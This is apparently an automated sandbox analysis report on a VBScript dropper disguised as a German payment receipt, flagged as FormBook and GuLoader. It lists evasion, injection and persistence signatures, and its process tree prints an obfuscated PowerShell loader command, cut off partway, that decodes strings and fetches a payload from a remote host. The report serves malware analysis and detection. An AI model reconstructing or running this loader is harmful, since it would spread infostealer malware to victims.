Edit tour
Windows
Analysis Report
Zahlungsbeleg 202405029058.vbs
Overview
General Information
Detection
FormBook, GuLoader
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Maps a DLL or memory area into another process
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Very long command line found
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 6712 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\Zahlu ngsbeleg 2 0240502905 8.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - PING.EXE (PID: 6656 cmdline:
ping googl e.com -n 1 MD5: 2F46799D79D22AC72C241EC0322B011D) - conhost.exe (PID: 6976 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - PING.EXE (PID: 7184 cmdline:
ping %.%.% .% MD5: 2F46799D79D22AC72C241EC0322B011D) - conhost.exe (PID: 7192 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 7240 cmdline:
C:\Windows \system32\ cmd.exe /c dir MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7248 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7316 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "$Reglorif ied = 1;$T oupe='S';$ Toupe+='ub strin';$To upe+='g';F unction Ty knende($Fr ontotempor al){$Komma ndodeles=$ Frontotemp oral.Lengt h-$Reglori fied;For($ Nummerorde ns=5;$Numm erordens - lt $Komman dodeles;$N ummerorden s+=6){$Crp e+=$Fronto temporal.$ Toupe.Invo ke( $Numme rordens, $ Reglorifie d);}$Crpe; }function biblioteks filerne($k edelcentra len){& ( $Dataanlgs ) ($kedelc entralen); }$Udskille s=Tyknende 'SnuggMfo .oro Loo z Ka.aniStoo ,lFlan lSm aaga len,/ U fi5H.gg e.Mawse0 X ant Lint(R eae WPaiki iTorden St nidSk ftoM .gtswGrass sGivin Hov s.NAs.erTO utbr Kvot, 1Goupi0Poe ss. ook0Re cr,;Tilkn B.arWUnder iTorrinKal ku6Rekor4V andm; Oldt GodkexSla mb6Anvis4O verw;Rente TaalrRrgs svsvige:Ae ,li1Synan2 Rupi1 uka t.,onra0Lo .ds)Apoth LouirGTemp ee OvercGe nfokIso.co Syst/Meni s2Ioevr0St an.1Varsl0 sses0subs t1 Coex0Un af1Raias IldneFDo,e diOvnhur,e tere Luk,f Areahonobb lx ara/ Ek vi1kha.e2F olk,1B.lls . Besk0For me ';$Prim evally=Tyk nende '.rs teUHy,ossS quibe,pare rRewar-Ten anAFictigA ffaee parn Jerrt Myr t ';$Dien= Tyknende ' SynsmhMili ttVajedtDa renpS.eep: Dob,o/Perp l/Erase8Si ren7Nonwe. jack1 ,iv e2 Over1 A r,g.Beret1 Retst0Male r5Reded..i ppe5Spare4 Count/Scul pOChapoxMe c da D,pll Bl eduSlip pr imuli C plma Indi2 ret t0Libe t9Thick.No ,ensPostnm Jo,dbi.ons u ';$Longr un=Tyknend e 'Folke>P atte ';$Da taanlgs=Ty knende ' V erdi Unree NonvxTppe ';$Tradit ions='Nash ira';bibli oteksfiler ne (Tyknen de 'GregsS UnasseGrmm etPersi-Hv alfCPieb.o Inv n Cin ntHerdsePr ve nIndtet Brede Argu m-RefitPPl a taMbelpt Afgrfhklar knivbTC,r va:morte\K onomGSlutk rS.igey S, agnBlahltP ne,me ster n SilkdTal ene FejnsM es n.Friti t Submxbis mutCosmo U nder-Rhypt V Ext.a ,a tol f,inuP ublieKolla Nook $Skr ivTRubler. orynaChanc dZonaliGe. trtC.nidi NoncoKitni n Uds,sOri g ;Recep ' );bibliote ksfilerne (Tyknende ' Repai ed elfBasqu D iff(Hoppet Stucce Sce ,s ivsvtEp e.i-.odstp BarriaTyro ltSysgth a ng CalcaTP atro:Rigad \IsoclGUno rdr Aggrya mputn,hroo tBordhe ag ttn myecdG ui ee Reve sFlere.Ps, udtPlastxP antet prun ) Snot{D s ene Vindxl eafsiKultu tSonor} Si es;Limen ' );$Kursuso versigten = Tyknende 'Servoe o ntcN gashB i.looUnchi Preco%Vag nuaKodiapP seu,pSe,ig dAlt.baPer u.tInteraS pa.l%Stuve \DismeVcir c.aKerattF arvee Spra rSleyspS.a ngaSha rsg utsesUnmew eYlvahnSun dheAfspnsK sehu2Wiens 4 Para.Bes teAPatruc .llecmyone Resou&Par ad&t.lip D iscueDures cBogtihLge l,okilot R e.ia$B sni ';bibliot eksfilerne (Tyknende 'Blidh$Ki tnigToxoll strbsogeck obS,ffeaAr istlTrans: tun,nTMeph ii.ammetDe uta.apitr Sto.m= I.e r(Modtac P resmIndevd Afhng Hens t/tenebcOp t.i Im,r$H